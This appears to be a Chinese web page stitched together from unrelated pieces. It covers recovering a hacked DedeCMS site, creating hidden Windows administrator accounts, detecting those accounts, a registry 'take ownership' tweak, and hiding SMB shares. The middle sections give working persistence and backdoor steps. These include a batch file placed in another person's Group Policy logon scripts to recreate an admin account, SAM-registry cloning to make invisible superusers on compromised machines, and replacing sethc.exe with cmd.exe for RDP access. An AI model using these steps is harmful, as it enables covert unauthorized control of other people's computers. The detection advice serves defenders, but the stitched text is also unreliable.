网站被挂马怎么恢复,百度收录的怎么删除
解决方法,我总结了下面几条,希望可以帮助你。
1,一些文件的权限:把根目录下的indexphp,tagphp等设置成只读,并且把所有的模板文件设置成只读格式。
2,dedecms目录的安全设置:data/cache/、templets、uploads 目录设置可读写,不可执行权限。include、member、plus设置可读 可执行 不可写权限,由于dedecms并没有任何地方使用存储的过程,因此可以禁用 FILE、EXECUTE 等执行存储过程或文件操作的权限。其中假如member等目录对你没有用处的话,最好把目录名字改掉。
3,网站程序安全:这也是最根本的防范,最好及时更新dede的版本,跟上官方的最新版,当然你也可以找一些高手把程序优化的更符合你的安全需求。
4,后台管理目录:后台管理目录隔一段时间修改一次,最好修改复杂一点,这样可以让小黑客们下手难度增加。
5,FTP 网站管理密码: FTP密码和网站管理密码建议经常修改,因为很多黑客都在用暴力破解密码,把密码改的复杂些尽量掺杂着特殊符合和字母
6,不用的端口最好关掉:你可以用服务器本身的端口过滤功能,也可以用一些服务器管理软件,对服务器不用的端口进行关闭。
7,查找一下服务器的隐藏账户:这个比较麻烦,有的隐藏账户很难处理干净!在这里就不一一叙述了,你可以在百度上搜索一下相关资料,实在不行的话最好重装系统!
百度收录是不能一下子删除的,这是有个时间段的,等百度再次来抓取的时候发现你没这个网页会变成404页面,然后慢慢消失的。你可以提交最新网站地图,加速一下收录删除的速度
你说的是你建立了一个管理员以后原来的那个名为administrator的名字显示不出来了是吧?
这是windows的默认设置
administrator输入内置帐号。
你只要新建一个管理员它就会隐藏起来。
如果你要显示两个的话我建议你再建立一个管理员就是了。
一建立一个别人永远删不掉的管理员用户 操作步骤:
1、在自己电脑里面建立一个txt文本文件
2、在里面输入内容
@echo off
net user yixiao 123456 /add 注释:前面yixiao是用户名后面123456是密码;
net localgroup administrators yixiao /add
3、把这个文件保存,更改后缀为yixiaobat 注释:前面名字随便,后面格式一定要是bat;
4、把这个文件拷贝到对方电脑C:\WINNT\system32\GroupPolicy\User\scripts\Logon文件目录下,没有的话自己创建。
完成,下次对方电脑无论如何都有这个管理员帐号,删除了,下次启动还有!
如果把里面的内容改成
@echo off
net user administrator 123456 /add
意思是不管你怎么改,下次启动管理员帐号administrator密码一直是123456。
二俺认为上述的方法并不理想,可以用隐藏帐号方法来建帐号会更好 。
操作步骤:
1、首先建立一个帐号结尾要带$号 ,如果yixiao$ , 密码自己随便,然后把帐号删除
2、将以下代码保存成(reg)注册表形式
代码如下:
——————————————————————————-
Windows Registry Editor Version 500
[HKEY_LOCAL_MACHONE\SAM\SAM\Domains\Account\users\
names\yixiao$]
@=hex(1f4):
——————————————————————————-
说明:1f4是Administrator帐号十六进制的值
3、保存好后导入 ,然后用CMD命令设置密码
net user yixiao$ 123456
这样一个隐形帐号就建立好了,用户在“本地用户和组”内根本无法看到这个帐号。所以也不存在删除帐号。记得千万别在同事的电脑上捣鼓哦,如果被查出来。。。。。嘿嘿:-)
隐藏管理员帐号三分钟搞定
对 regeditexe我想大家都很熟悉,但却不能对注册表的项键设置权限,而regedt32exe最大的优点就是能够对注册表的项键设置权限。 nt/2000/xp的帐户信息都在注册表的HKEY_LOCAL_MACHINE\\SAM\\SAM键下,但是除了系统用户SYSTEM外,其它用户 都无权查看到里面的信息,因此我首先用regedt32exe对SAM键为我设置为“完全控制”权限。这样就可以对SAM键内的信息进行读写了了。具体 步聚如下:
1、假设我们是以超级用户administrator登录到开有终端服务的肉鸡上的,首先在命令行下或帐户管理器中建立一个帐户:hacker$,这里我在命令行下建立这个帐户 net user hacker$ 1234 /add
2、在开始/运行中输入:regedt32exe并回车来运行regedt32exe。
3、点“权限”以后会弹出窗口点添加将我登录时的帐户添加到安全栏内,这里我是以administrator的身份登录的,所以我就将 administrator加入,并设置权限为“完全控制”。这里需要说明一下:最好是添加你登录的帐户或帐户所在的组,切莫修改原有的帐户或组,否则将 会带来一系列不必要的问题。等隐藏超级用户建好以,再来这里将你添加的帐户删除即可。
4、再点“开始”→“运行”并输 入”regeditexe” 回车,启动注册表编辑器regeditexe。 打开键:HKEY_LOCAL_MAICHINE\\SAM\\SAM\\Domains\\account\\user\\names [url=file://hacker$/]\\hacker$[/url]”
5、将项hacker$、00000409、000001F4导出为hackerreg、409reg、 1f4reg,用记事本分别打这几个导出的文件进行编辑,将超级用户对应的项000001F4下的键”F”的值复制,并覆盖hacker$对应的项 00000409下的键”F”的值,然后再将00000409reg与hackerreg合并。
6、在命令行下执行net user hacker$ /del将用户hacker$删除:net user hacker$ /del
7、在regeditexe的窗口内按F5刷新,然后打文件-导入注册表文件将修改好的hackerreg导入注册表即可
8、到此,隐藏的超级用户hacker$已经建好了,然后关闭regeditexe。在regedt32exe窗口内把HKEY_LOCAL_MACHINE\\SAM\\SAM键权限改回原来的样子(只要删除添加的帐户administrator即可)。
9、注意:隐藏的超级用户建好后,在帐户管理器看不到hacker$这个用户,在命令行用“net user”命令也看不到,但是超级用户建立以后,就不能再改密码了,如果用net user命令来改hacker$的密码的话,那么在帐户管理器中将又会看这个隐藏的超级用户了,而且不能删除。
那我们管理员又该如何把“隐藏账户”请出系统
隐藏账户的危害可谓十分巨大。因此我们有必要在了解了账户隐藏技术后,再对相应的防范技术作一个了解,把隐藏账户彻底请出系统。
1、添加“$”符号型隐藏账户
对于这类隐藏账户的检测比较简单。一般黑客在利用这种方法建立完隐藏账户后,会把隐藏账户提升为管理员权限。那么我们只需要在“命令提示符”中输入 “net localgroup administrators”就可以让所有的隐藏账户现形。如果嫌麻烦,可以直接打开“计算机管理”进行查看,添加“$”符号的账户是无法在这里隐藏 的。
2、修改注册表型隐藏账户
由于使用这种方法隐藏的账户是不会在“命令提示符”和“计算机管理”中看到的,因此可以到 注册表中删除隐藏账户。来到“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names”,把这 里存在的账户和“计算机管理”中存在的账户进行比较,多出来的账户就是隐藏账户了。想要删除它也很简单,直接删除以隐藏账户命名的项即可。
3、无法看到名称的隐藏账户
如果黑客制作了一个修改注册表型隐藏账户,在此基础上删除了管理员对注册表的操作权限。那么管理员是无法通过注册表删除隐藏账户的,甚至无法知道黑客建 立的隐藏账户名称。不过世事没有绝对,我们可以借助“组策略”的帮助,让黑客无法通过隐藏账户登陆。点击“开始”→“运行”,输入 “gpeditmsc”运行“组策略”,依次展开“计算机配置”→“Windows 设置”→“安全设置”→“本地策略”→“审核策略”,双击右边的“审核策略更改”,在弹出的设置窗口中勾选“成功”,然后点“确定”。对“审核登陆事件” 和“审核过程追踪”进行相同的设置。
进行登陆审核后,可以对任何账户的登陆操作进行记录,包括隐藏账户,这样我们就可以通过“计算机管理”中 的“事件查看器”准确得知隐藏账户的名称,甚至黑客登陆的时间。即使黑客将所有的登陆日志删除,系统还会记录是哪个账户删除了系统日志,这样黑客的隐藏账 户就暴露无疑了。
得知隐藏账户的名称后就好办了,但是我们仍然不能删除这个隐藏账户,因为我们没有权限。但是我们可以在“命令提示符”中输入“net user 隐藏账户名称 654321”更改这个隐藏账户的密码。这样这个隐藏账户就会失效,黑客无法再用这个隐藏账户登陆。
win2003下创建永远的隐藏帐户操作一、二
前段时间比较流行的一句话”肉机”其实要想控制远端的计算机,那我想就少不了隐藏用户帐号的问题了,其实创建隐藏用户帐号还是比较简单的,现在我就把创建隐藏用户帐号告诉大家。
其实每一个用户帐号在注册表中都有自己帐号数据项
首先我们看看管理员在注册表中的数据项是什么样的
操作一、打开注册表:HKEY_LOCAL_MACHINE\SAM\SAM
SAM是保存用户帐号的地方,不过这个“项”在默认情况下是不可见的。我们如果想看内部的内容就必须首先对其授权。(建议对注册表不是很熟悉的朋友不要随便改动注册表)
操作二、认识注册表中的帐号分类
在OS中的用户帐号无论是内置帐号,还是后建帐号,在注册表中都能看见。不过有两个帐号大家一定要能够认识,那就是管理员帐号和guest帐号。
”000001fa4”表示的是管理员帐号,即使管理员帐号被重命名了这个值也是不会变的,所以我们可以通过这个值来判断,重命名后的管理员帐号。
“000001fa5” 表示的是guest帐号,同样这个值也不会因为,来宾帐号给重命名而改变。剩下的其 它值基本上就是后来创建的用户帐号,生成值了。 认识了注册表后,现在我们就来利用”net user”命令创建帐号了,创建隐藏帐号必须在CMD下。有关常见的命令,这些命令也可以在OS的帮助中找到。
操作三、利用”net user”命令创建帐号
一、先建立隐藏用户 xbx$ 1、net user xbx$ 123,abc /add 这里的意思是说,建立个xbx$ 帐户密码是123,abc
1、C:\Documents and Settings\Administrator>net localgroup administrators xbx$ /add 这里的意思是说把xbx,以便让我们创建用户具备管理员权限。
一、观察注册表中的变化,并对注册表做相应的修改。 HKEY_LOCAL_MACHINE\SAM\SAM
1、找到我们刚刚创建的用户帐号
我们可以看见”000003f6”就是我们刚新建立的”xbx
2、在注册表中多帐号权限复制
找到HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users 这个项,打开”000001f4”项,然后再打开”F”。
然后将这里面的值,全选,粘帖并覆盖到”000003f6”的”F”值
3、导出注册表值
现在将注册表中的“000001f4”、“000003f6”和“xbx”都导入出来,可直接将Users所有键值都导出来,到文件
4、删除帐号
接下来我们再次进入“CMD”中删除“xbx
删除帐号后,则注册表中的值也就没有了,这个时候我们再把刚才导出的注册表项,导入到注册表中。 这个时候我们打开“本地计算机用户和组”就看不见“xbx”
先把system32下的sethcexe删除掉,然后 把cmdexe改名为sethcexe就OK了,利用的是5次连续敲击shift的热键功能,下次你3389登陆服务器的时候,就可以利用热键功能打开cmd,从而增加账号,就可以登录服务器了
开始 运行 输入gpeditmsc 。
计算机设置 windows设置 安全设置。
本地策略 , 用户权限分配 , 拒绝从网络访问此计算机 。
删除guest用户 ,或者guest用户可能没打开 ,可以打开控制面板 ,用户账户 ,进行更改 。
自己在桌面建一个文本文档 ,然后把下边的编译信息复制上去, 然后保存, 把文件后缀名的TXT改为reg ,然后再保存, 双击打开 ,植入注册表信息就可以了。 Windows Registry Editor Version 500
[HKEY_CLASSES_ROOT\\shell\runas] @="管理员取得所有权" "NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\\shell\runas\command]
@="cmdexe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmdexe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" [HKEY_CLASSES_ROOT\exefile\shell\runas2] @="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
@="cmdexe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmdexe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" [HKEY_CLASSES_ROOT\Directory\shell\runas] @="管理员取得所有权" "NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
@="cmdexe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
"IsolatedCommand"="cmdexe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"。
在局域网共享文件管理中,有时候为了保护服务器共享文件的安全,我们常常需要隐藏用户无权限访问的共享文件、设置共享文件隐藏,防止未经授权的用户越权访问共享文件的行为,尤其是还可以阻止外来用户随意接入单位局域网访问共享文件的行为。
具体如何实现呢?可以通过以下两种方案:
方案1、基于访问权限的枚举的机制隐藏共享文件夹访问权限、隐藏无访问权限的共享文件夹。
基于访问权限的枚举仅允许用户查看他们有权访问的基于SMB的共享文件夹中的文件和文件夹。如果某个用户对某个文件夹没有读取权限,则Windows会在该用户的视图中隐藏此文件夹。对于像包含很多用户的主目录这样的共享文件夹来说,此功能非常有用。
在共享文件夹上启用基于访问权限的枚举的步骤
1在共享和存储管理中,右键单击相应的共享文件夹,然后单击属性。
2在共享选项卡上,单击高级。
3选中启用基于访问权限的枚举复选框,然后单击确定。
下面通过一个例子来先睹为快,以Server2008服务器为例。
准备工作
a)创建用户Alex和Berry
b)创建文件夹Home,及子文件夹alex和berry。
c)分配共享及安全权限(目录只允许自己访问)
点击服务器管理,
点击文件和存储服务,
点击共享,
找到刚创建的共享文件夹Home,右键属性
在设置菜单,看到默认,枚举选项未选中,点击勾上
对比下,前后效果图。
小结:ABE功能确实可以大大改善用户的访问体验,但会给服务器增加一些负载,所以要看实际应用,还有该功能对本地管理员无效。
方案2、通过局域网文件共享设置软件来实现隐藏无权限共享文件夹的方法
如果你觉得上面的方法比较复杂,或者无法满足对管理员账号的控制,则也可以考虑通过部署一些服务器共享权限设置软件来实现,操作更为简单和方便。
例如有一款大势至局域网共享文件管理系统(下载地址:http://wwwgrablancom/gongxiangwenjianshenjihtml),通过在共享文件服务器上安装之后,就可以设置共享文件访问权限,可以实现操作系统文件访问权限,甚至域控制器共享文件访问权限无法实现的功能。比如只让读取共享文件而禁止复制共享文件、只让修改共享文件而禁止删除共享文件以及只让打开共享文件而禁止另存为本地磁盘,或拖拽到自己的电脑上,从而保护了共享文件的安全。如下图所示:
图:大势至文件共享管理工具
而针对隐藏共享文件的设置,只需要选择相应的共享文件夹,然后选择相应的用户,然后在访问权限那里勾选禁止读取,则这个用户就无法读取选中的共享文件夹,操作极为简单。如下图所示:
图:隐藏无权限访问的共享文件夹
总之,隐藏共享文件的设置、隐藏无权访问共享文件的方法,一方面可以通过操作系统的基于访问权限的枚举功能来实现;另一方面也可以借助于一些局域网共享文件管理软件来实现,具体采用哪种方法,可以根据自己的需要决定。
0条评论